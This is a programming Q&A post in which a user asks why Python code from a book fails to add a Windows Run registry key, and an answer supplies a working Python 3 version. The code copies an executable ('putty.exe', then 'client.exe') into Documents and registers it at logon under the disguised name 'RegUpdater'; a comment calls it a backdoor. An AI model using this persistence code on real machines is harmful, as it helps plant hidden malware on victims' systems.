# Trying to create a run Key in the Registry using Python

Tags: python, security

Hey guys I am using this code from a book.  For the code it does take putty and move it to the document folder, but it does not end up putting in the registry key.  I am running it python version 2.7 on a windows 7 64 bit machine.

```py
import os # needed for getting working directory
import shutil # needed for file copying
import subprocess # needed for getting user profile
import _winreg as wreg # needed for editing registry DB


path = os.getcwd().strip('/n') #Get current working directory where the backdoor gets executed, we use the output to build our source path

Null,userprof = subprocess.check_output('set USERPROFILE', shell=True).split('=')

destination = userprof.strip('\n\r') + '\\Documents\\' +'putty.exe'

if not os.path.exists(destination): 

    shutil.copyfile(path+'\putty.exe', destination)


    key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run",0,
                         wreg.KEY_ALL_ACCESS)
    wreg.SetValueEx(key, 'RegUpdater', 0, wreg.REG_SZ,destination)
    key.Close()
```

Answer (score 0):

I run it in python 3 and it works well

```py
path = os.getcwd().strip('\n')

Null, userprof = subprocess.check_output('set USERPROFILE', shell=True, stdin=subprocess.PIPE,
                                            stderr=subprocess.PIPE).decode().split('=')

destination = userprof.strip('\n\r') + '\\Documents\\' + 'client.exe'

if not os.path.exists(destination):
    shutil.copyfile(path + '\client.exe', destination)
    key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", 0,  wreg.KEY_ALL_ACCESS)
    wreg.SetValueEx(key,'RegUpdater', 0 , wreg.REG_SZ, destination)
    key.Close()
```